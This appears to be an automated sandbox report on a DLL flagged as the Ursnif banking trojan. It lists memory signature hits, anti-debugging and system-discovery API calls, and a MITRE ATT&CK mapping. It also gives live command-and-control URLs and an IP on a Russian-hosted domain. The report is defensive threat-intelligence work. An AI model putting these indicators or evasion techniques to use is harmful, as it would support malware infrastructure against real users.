Source: Yara match	File source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6608, type: MEMORYSTR

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Windows\SysWOW64\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D47E4C3 IsDebuggerPresent,

0_2_6D47E4C3

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4868A8 LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,

0_2_6D4868A8

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D471F7C LoadLibraryA,GetProcAddress,

0_2_6D471F7C

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CA7ED mov eax, dword ptr fs:[00000030h]	0_2_6D4CA7ED
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CA71C mov eax, dword ptr fs:[00000030h]	0_2_6D4CA71C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CA323 push dword ptr fs:[00000030h]	0_2_6D4CA323
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4CA7ED mov eax, dword ptr fs:[00000030h]	3_2_6D4CA7ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4CA71C mov eax, dword ptr fs:[00000030h]	3_2_6D4CA71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4CA323 push dword ptr fs:[00000030h]	3_2_6D4CA323

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D47EA62 GetProcessHeap,

0_2_6D47EA62

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.924056503.00000000017D0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.924491282.0000000002C70000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.924056503.00000000017D0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.924491282.0000000002C70000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.924056503.00000000017D0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.924491282.0000000002C70000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.924056503.00000000017D0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.924491282.0000000002C70000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00DE4454 cpuid

0_2_00DE4454

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	0_2_6D471E8A
Source: C:\Windows\System32\loaddll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6D489540
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,__invoke_watson,	0_2_6D47F974
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_6D489121
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	0_2_6D4895ED
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_6D48919E
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_6D487594
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D47E05B
Source: C:\Windows\System32\loaddll32.exe	Code function: __crtGetLocaleInfoA_stat,	0_2_6D48806A
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D47E01E
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	0_2_6D489416
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D4890E1
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	0_2_6D486F92
Source: C:\Windows\System32\loaddll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	0_2_6D488E6D
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	0_2_6D489221
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6D489540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,__invoke_watson,	3_2_6D47F974
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_6D489121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	3_2_6D4895ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_6D48919E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_6D487594
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6D47E05B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __crtGetLocaleInfoA_stat,	3_2_6D48806A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6D47E01E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	3_2_6D489416
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6D4890E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	3_2_6D486F92
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	3_2_6D488E6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	3_2_6D489221

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D471144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_6D471144

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00DE4454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_00DE4454

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D471F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6D471F10

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6608, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6608, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API3	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Security Software Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery34	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mental.dll	4%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.de0000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
5.2.rundll32.exe.53e0000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
3.2.rundll32.exe.790000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Label	Link
gtr.antoinfer.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://gtr.antoinfer.com/mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z	100%	Avira URL Cloud	malware
http://gtr.antoinfer.com/02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gtr.antoinfer.com	185.228.233.17	true	true	8%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://gtr.antoinfer.com/mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z	true	Avira URL Cloud: malware	unknown
http://gtr.antoinfer.com/02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.228.233.17	gtr.antoinfer.com	Russian Federation		64439	ITOS-ASRU	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	455445
Start date:	28.07.2021
Start time:	13:45:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	mental.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.winDLL@16/8@2/2
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 21.6% (good quality ratio 20.6%) Quality average: 79.7% Quality standard deviation: 28.5%
HCA Information:	Successful, ratio: 77% Number of executed functions: 72 Number of non-executed functions: 81
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 13.88.21.125, 104.43.193.48, 93.184.221.240, 20.190.160.5, 20.190.160.135, 20.190.160.131, 20.190.160.133, 20.190.160.9, 20.190.160.1, 20.190.160.70, 20.190.160.68, 20.82.209.183, 2.18.105.186, 20.82.210.154, 23.10.249.26, 23.10.249.43, 152.199.19.161, 20.54.110.249 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, ams1.next.a.prd.aadg.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net, cs9.wpc.v0cdn.net Execution Graph export aborted for target rundll32.exe, PID 6632 because there are no executed function Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:47:16	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gtr.antoinfer.com	lj3H69Z3Io.dll	Get hash	malicious	Browse	167.172.38.18
